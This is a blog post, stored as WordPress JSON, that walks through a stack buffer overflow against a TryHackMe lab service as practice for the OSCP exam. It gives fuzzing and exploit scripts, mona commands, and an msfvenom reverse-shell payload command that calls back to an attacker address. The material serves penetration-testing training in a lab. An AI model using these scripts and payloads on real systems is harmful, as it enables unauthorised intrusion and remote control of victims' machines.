{"id":140,"date":"2023-02-27T22:29:23","date_gmt":"2023-02-27T22:29:23","guid":{"rendered":"https:\/\/merrillnewman.tech\/?p=140"},"modified":"2023-02-27T22:31:11","modified_gmt":"2023-02-27T22:31:11","slug":"buffer-overflow-practice-for-oscp","status":"publish","type":"post","link":"https:\/\/merrillnewman.tech\/?p=140","title":{"rendered":"Buffer Overflow Practice For OSCP"},"content":{"rendered":"\n

Overview<\/h3>\n\n\n\n

As part of the OSCP exam you may or may not have to perform a buffer overflow. Even without any security measures in place this can still be a daunting tasks for beginners. This article will not teach you from the ground up how to perform a buffer overflow but instead an easy methodology to follow for OSCP-like buffer overflows.<\/p>\n\n\n\n\n\n\n\n

Basic Process<\/h3>\n\n\n\n

An OSCP style buffer overflow can consistently be exploited by doing the following steps.<\/p>\n\n\n\n

    \n
  1. Fuzzing to find the crash point<\/li>\n\n\n\n
  2. Overwriting the EIP<\/li>\n\n\n\n
  3. Finding bad characters<\/li>\n\n\n\n
  4. Finding a jump point<\/li>\n\n\n\n
  5. Packing in our shell code safely<\/li>\n\n\n\n
  6. Exploiting<\/li>\n<\/ol>\n\n\n\n

    I will be using the Buffer Overflow Prep room from TryHackMe for the example.<\/p>\n\n\n\n

    Finding The Crash Point<\/h3>\n\n\n\n

    We can use this script to begin fuzzing the application.<\/p>\n\n\n\n

    #!\/usr\/bin\/env python3\n\nimport socket, time, sys\n\nip = \"10.10.21.132\"\n\nport = 1337\ntimeout = 5\nprefix = \"OVERFLOW1 \"\n\nstring = prefix + \"A\" * 100\n\nwhile True:\n  try:\n    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n      s.settimeout(timeout)\n      s.connect((ip, port))\n      s.recv(1024)\n      print(\"Fuzzing with {} bytes\".format(len(string) - len(prefix)))\n      s.send(bytes(string, \"latin-1\"))\n      s.recv(1024)\n  except:\n    print(\"Fuzzing crashed at {} bytes\".format(len(string) - len(prefix)))\n    sys.exit(0)\n  string += 100 * \"A\"\n  time.sleep(1)<\/code><\/pre>\n\n\n\n
    \"\"
    Fuzzing the application with the python script<\/figcaption><\/figure>\n\n\n\n
    Overwriting the EIP<\/h3>\n\n\n\n
    Now that we know the crash point is at 2000 bytes, we can use another script as the base for our exploit.<\/p>\n\n\n\n
    import socket\n\nip = \"10.10.21.132\"\nport = 1337\n\nprefix = \"OVERFLOW1 \"\noffset = 0\noverflow = \"A\" * offset\nretn = \"\"\npadding = \"\"\npayload = \"\"\npostfix = \"\"\n\nbuffer = prefix + overflow + retn + padding + payload + postfix\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ntry:\n  s.connect((ip, port))\n  print(\"Sending evil buffer...\")\n  s.send(bytes(buffer + \"\\r\\n\", \"latin-1\"))\n  print(\"Done!\")\nexcept:\n  print(\"Could not connect.\")<\/code><\/pre>\n\n\n\n
    After saving this exploit script we can then create a pattern that’s 400 bytes longer using <\/p>\n\n\n\n
    msf-pattern_create<\/code>.<\/p>\n\n\n\n
    msf-pattern_create -l 2400<\/code><\/pre>\n\n\n\n
    After adding the created pattern to the payload<\/code> variable of our exploit script we can run it and it should crash again. Once it crashes we can use mona to find the EIP offset using this command.<\/p>\n\n\n\n
    !mona findmsp -distance 2400<\/code><\/pre>\n\n\n\n
    \"\"
    Finding the EIP offset using mona<\/figcaption><\/figure>\n\n\n\n
    As we can see in the output, mona found the EIP at offset 1978, we can update the offset<\/code> variable in our exploit script to 1978 and set the retn<\/code> variable to BBBB to test our ability to overwrite the EIP.<\/p>\n\n\n\n
    \"\"
    Update variables to test ability to overwrite EIP<\/figcaption><\/figure>\n\n\n\n
    After running our updated exploit script we should see EIP overwritten with “BBBB”.<\/p>\n\n\n\n
    \"\"
    Overwritten EIP<\/figcaption><\/figure>\n\n\n\n
    Finding Bad Characters<\/h3>\n\n\n\n
    Now that we can overwrite the EIP we can work on finding bad characters. We can use mona to generate a byte array (excluding null as it is nearly always a bad character).<\/p>\n\n\n\n
    !mona bytearray -b \"\\x00\"<\/code><\/pre>\n\n\n\n
    After generating the byte array with mona we can use this python script to generate an identical one.<\/p>\n\n\n\n
    for x in range(1, 256):\n  print(\"\\\\x\" + \"{:02x}\".format(x), end='')\nprint()<\/code><\/pre>\n\n\n\n
    Now we can replace the payload variable in our exploit script with the byte array we just generated. Once the the program crashes we can use mona to start weeding out bad characters.<\/p>\n\n\n\n
    !mona compare -f C:\\mona\\oscp\\bytearray.bin -a <ESP address><\/code><\/pre>\n\n\n\n
    \"\"
    Finding bad characters with mona<\/figcaption><\/figure>\n\n\n\n
    Note that all of these might not be bad characters, bad characters may corrupt the next byte or in some cases the rest of the string. With this in mind the bytes I’d start to remove are 07<\/code>, 2e<\/code> and a0<\/code>. <\/p>\n\n\n\n
    Finding a Jump Point<\/h3>\n\n\n\n
    Now that we now which characters are bad we can look for a JMP ESP<\/code> instruction that doesn’t contain bad characters using mona.<\/p>\n\n\n\n
    !mona jmp -r esp -cpb \"\\x00\\x07\\x2e\\xa0\"<\/code><\/pre>\n\n\n\n
    \"\"
    Finding JMP ESP instructions using mona<\/figcaption><\/figure>\n\n\n\n
    Choose one of these addresses and update the retn variable of the exploit script with it. We put the address in backwards in our code since the system is little-endian.<\/p>\n\n\n\n
    \"\"
    Updated retn <\/figcaption><\/figure>\n\n\n\n
    Inserting Payload<\/h3>\n\n\n\n
    The next step is to generate our payload and insert it into our buffer, we can use msfvenom to create the payload.<\/p>\n\n\n\n
    msfvenom -p windows\/shell_reverse_tcp LHOST=10.13.2.65 LPORT=4444 EXITFUNC=thread -b \"\\x00\\x07\\x2e\\xa0\" -f c<\/code><\/pre>\n\n\n\n
    Since an encoder was likely used to generate our payload we will need space in memory for it to unpack itself, we will change the padding<\/code> variable to add some nops before our payload. Once everything is in place our exploit should look something like this.<\/p>\n\n\n\n
    \"\"
    Complete exploit<\/figcaption><\/figure>\n\n\n\n
    Exploit<\/h3>\n\n\n\n
    With everything in place all we need to do is set up a listener and run the exploit.<\/p>\n\n\n\n
    \"\"
    Running exploit<\/figcaption><\/figure>\n\n\n\n
    \"\"
    Catching the shell<\/figcaption><\/figure>\n\n\n\n
    References<\/h3>\n\n\n\n
    https:\/\/tryhackme.com\/room\/bufferoverflowprep<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
    Overview As part of the OSCP exam you may or may not have to perform a buffer overflow. Even without any security measures in place this can still be a daunting tasks for beginners. This article will not teach you from the ground up how to perform a buffer overflow but instead an easy methodology […]<\/p>\n","protected":false},"author":1,"featured_media":157,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"hide_page_title":"","_coblocks_attr":"","_coblocks_dimensions":"","_coblocks_responsive_height":"","_coblocks_accordion_ie_support":"","_mi_skip_tracking":false,"footnotes":""},"categories":[6],"tags":[],"class_list":["post-140","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-windows"],"_links":{"self":[{"href":"https:\/\/merrillnewman.tech\/index.php?rest_route=\/wp\/v2\/posts\/140","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/merrillnewman.tech\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/merrillnewman.tech\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/merrillnewman.tech\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/merrillnewman.tech\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=140"}],"version-history":[{"count":7,"href":"https:\/\/merrillnewman.tech\/index.php?rest_route=\/wp\/v2\/posts\/140\/revisions"}],"predecessor-version":[{"id":158,"href":"https:\/\/merrillnewman.tech\/index.php?rest_route=\/wp\/v2\/posts\/140\/revisions\/158"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/merrillnewman.tech\/index.php?rest_route=\/wp\/v2\/media\/157"}],"wp:attachment":[{"href":"https:\/\/merrillnewman.tech\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=140"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/merrillnewman.tech\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=140"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/merrillnewman.tech\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=140"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}